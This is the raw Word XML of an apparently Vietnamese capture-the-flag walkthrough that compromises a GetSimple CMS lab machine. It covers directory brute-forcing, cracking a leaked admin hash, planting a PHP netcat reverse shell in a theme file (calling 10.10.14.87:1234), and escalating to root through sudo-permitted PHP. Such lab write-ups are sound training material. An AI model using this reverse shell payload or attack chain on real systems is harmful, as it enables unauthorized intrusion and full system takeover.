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BB9A" w14:textId="77777777" w:rsidR="00E364A8" w:rsidRPr="00E364A8" w:rsidRDefault="00E364A8" w:rsidP="00E364A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E364A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Knowledge Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9385C" w14:textId="2E1A0C16" w:rsidR="00A512A0" w:rsidRDefault="00E364A8">
      <w:r>
        <w:t xml:space="preserve">Ip: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E364A8">
        <w:t>10.129.10.202</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A90A1" w14:textId="4A63F2FC" w:rsidR="00E364A8" w:rsidRDefault="00E364A8">
      <w:r>
        <w:t>Đầu tiên ta kiểm tra bằng whatweb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF57261" w14:textId="0EA7C05D" w:rsidR="00E364A8" w:rsidRDefault="00E364A8">
      <w:r w:rsidRPr="00E364A8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="548B7073" wp14:editId="1B845E58">
            <wp:extent cx="59436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44F9" w14:textId="5FE1CD32" w:rsidR="00E364A8" w:rsidRDefault="00E364A8">
      <w:r>
        <w:t>Biết được hệ điều hành đang sử dụng là linux version 2.4.41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F3901" w14:textId="1B5F9DCB" w:rsidR="00E364A8" w:rsidRDefault="00E364A8">
      <w:r>
        <w:t>Tiếp theo sử dụng gobuster để burp force directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1996D5E6" w14:textId="5297AFA5" w:rsidR="00E364A8" w:rsidRDefault="00E364A8">
      <w:r w:rsidRPr="00E364A8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="203A262F" wp14:editId="1D6494FA">
            <wp:extent cx="59436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A8D" w14:textId="77777777" w:rsidR="00201249" w:rsidRDefault="00201249"/>
    <w:p w14:paraId="5C2018AB" w14:textId="77777777" w:rsidR="00201249" w:rsidRDefault="00201249"/>
    <w:p w14:paraId="1D7C96FF" w14:textId="77777777" w:rsidR="00201249" w:rsidRDefault="00201249"/>
    <w:p w14:paraId="1B739D51" w14:textId="77777777" w:rsidR="00201249" w:rsidRDefault="00201249"/>
    <w:p w14:paraId="2EF60F19" w14:textId="77777777" w:rsidR="00201249" w:rsidRDefault="00201249"/>
    <w:p w14:paraId="3AD1F056" w14:textId="77777777" w:rsidR="00201249" w:rsidRDefault="00201249"/>
    <w:p w14:paraId="2FD80AA3" w14:textId="70BDC23F" w:rsidR="00E364A8" w:rsidRDefault="00E364A8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cùng kiểm tra </w:t>
      </w:r>
      <w:r w:rsidR="00201249">
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> backups xem có gì nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB6F9E" w14:textId="67CD324C" w:rsidR="00201249" w:rsidRDefault="00201249">
      <w:r w:rsidRPr="00201249">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="460F7DDA" wp14:editId="334293FE">
            <wp:extent cx="5943600" cy="2144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F125" w14:textId="74D46DE7" w:rsidR="00201249" w:rsidRDefault="00201249">
      <w:r>
        <w:t xml:space="preserve">Ta thấy được file backup cũ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E67F9C4" w14:textId="59DB617C" w:rsidR="00201249" w:rsidRDefault="00201249">
      <w:r>
        <w:t>Sau khi đọc file admin.xml.bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E35172" w14:textId="041D8893" w:rsidR="00201249" w:rsidRDefault="00201249">
      <w:r w:rsidRPr="00201249">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C0D25DF" wp14:editId="7A64C9ED">
            <wp:extent cx="5943600" cy="947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F523" w14:textId="0209155E" w:rsidR="00201249" w:rsidRDefault="00201249">
      <w:r>
        <w:t>Quá tuyệt vời ta có được user admin và mật khẩu, dường như mật khẩu đã được mã hóa bằng phương thức SHA-1. Sau khi decrypt ta lấy được mật khẩu là admin. Cùng đăng nhập thử bằng thông tin vừa lấy được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D46AC4" w14:textId="63EBD9B3" w:rsidR="00201249" w:rsidRDefault="00201249">
      <w:r w:rsidRPr="00201249">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A0B9904" wp14:editId="6C821F08">
            <wp:extent cx="4663440" cy="2829117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926" cy="28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E80F" w14:textId="451F47C8" w:rsidR="00201249" w:rsidRDefault="00201249">
      <w:r>
        <w:t>Vào được rồi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EB38CC" w14:textId="43D5F5E2" w:rsidR="00201249" w:rsidRDefault="00201249">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Dùng Metasploit để xem getsimple này có lỗi nào phổ biến hông, thật may là có</w:t>
      </w:r>
      <w:r w:rsidRPr="00201249">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="651198C9" wp14:editId="7CD16E88">
            <wp:extent cx="59436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24F7" w14:textId="77777777" w:rsidR="00B85C4B" w:rsidRDefault="00B85C4B">
      <w:r>
        <w:t xml:space="preserve">Tiếp theo chúng ta tìm được file theme có thể chỉnh sửa code và chèn đoạn revease shell này vào : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4948B7" w14:textId="67CC48F7" w:rsidR="00201249" w:rsidRDefault="00B85C4B">
      <w:r w:rsidRPr="00B85C4B">
        <w:t>&lt;?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.87 1234&gt;/tmp/f"); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB06B2" w14:textId="2C93724C" w:rsidR="00B85C4B" w:rsidRDefault="00B85C4B">
      <w:r w:rsidRPr="00B85C4B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F948C7A" wp14:editId="65C44B9D">
            <wp:extent cx="5943600" cy="3693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A028" w14:textId="77777777" w:rsidR="00B85C4B" w:rsidRDefault="00B85C4B"/>
    <w:p w14:paraId="00AA6C3E" w14:textId="77777777" w:rsidR="00B85C4B" w:rsidRDefault="00B85C4B"/>
    <w:p w14:paraId="1DA0572F" w14:textId="77777777" w:rsidR="007D01AD" w:rsidRDefault="007D01AD"/>
    <w:p w14:paraId="22571785" w14:textId="77777777" w:rsidR="00B85C4B" w:rsidRDefault="00B85C4B"/>
    <w:p w14:paraId="752952E1" w14:textId="65832A5A" w:rsidR="00B85C4B" w:rsidRDefault="00B85C4B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sau đó listen theo port 1234 như đã viết ở trên rồi reload lại trang home của web target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A600CCF" w14:textId="06DC6DEA" w:rsidR="00B85C4B" w:rsidRDefault="00B85C4B">
      <w:r w:rsidRPr="00B85C4B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="517157A3" wp14:editId="42FCE627">
            <wp:extent cx="5943600" cy="3860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5D4F" w14:textId="7F3CCFAF" w:rsidR="00B85C4B" w:rsidRDefault="00B85C4B">
      <w:r>
        <w:t>Tuyệt vời ta đã revease shell thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E21536" w14:textId="75F4FE7F" w:rsidR="007D01AD" w:rsidRDefault="00B85C4B">
      <w:r>
        <w:t>Tới đây sau một hồi lần mò ta đã xác định được flag user.txt nằm trong đường dẫn /home/mrb3n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE30F29" w14:textId="33C2C3E6" w:rsidR="00B85C4B" w:rsidRDefault="00B85C4B">
      <w:r w:rsidRPr="00B85C4B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78E7FFC6" wp14:editId="724FAEE2">
            <wp:extent cx="4402649" cy="22116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717" cy="22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B602" w14:textId="77777777" w:rsidR="00666D02" w:rsidRDefault="00666D02"/>
    <w:p w14:paraId="6EC6DDE3" w14:textId="77777777" w:rsidR="00666D02" w:rsidRDefault="00666D02"/>
    <w:p w14:paraId="23D1CE49" w14:textId="19AEE0B5" w:rsidR="00666D02" w:rsidRDefault="00666D02">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tiếp tục thử tải LinEnum vào server target để quét thu thập dữ liệu, ta thấy có đường dẫn có thể sử dụng root mà không cần mật khẩu là /usr/bin/php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CBA5C3" w14:textId="2A99395C" w:rsidR="00B85C4B" w:rsidRDefault="007D01AD">
      <w:r w:rsidRPr="007D01AD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="533A4B86" wp14:editId="178D2D8B">
            <wp:extent cx="5943600" cy="3258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DB4" w14:textId="278294B4" w:rsidR="00666D02" w:rsidRDefault="00666D02">
      <w:r>
        <w:t>Chúng ta mượn quyền để nâng user đang sử dụng lên root nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF4C3B5" w14:textId="6D82D6C2" w:rsidR="00666D02" w:rsidRDefault="00666D02">
      <w:r w:rsidRPr="00666D02">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F75C058" wp14:editId="018E9885">
            <wp:extent cx="5943600" cy="1962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860" w14:textId="6003D823" w:rsidR="00666D02" w:rsidRDefault="00666D02">
      <w:r>
        <w:t>Vào thư mục root để lấy flag cuối cùng nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0320197C" w14:textId="103AA446" w:rsidR="00666D02" w:rsidRDefault="00666D02">
      <w:r w:rsidRPr="00666D02">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34BCC402" wp14:editId="23204FAE">
            <wp:extent cx="5943600" cy="972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A0"/>
    <w:rsid w:val="00201249"/>
    <w:rsid w:val="004F463D"/>
    <w:rsid w:val="00666D02"/>
    <w:rsid w:val="007D01AD"/>
    <w:rsid w:val="00A5104D"/>
    <w:rsid w:val="00A512A0"/>
    <w:rsid w:val="00B85C4B"/>
    <w:rsid w:val="00E3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ECA9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0DC0D305-4939-4E59-8D14-9D076D1B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2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1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Bảo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kiều Bảo</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-31T10:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-31T12:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>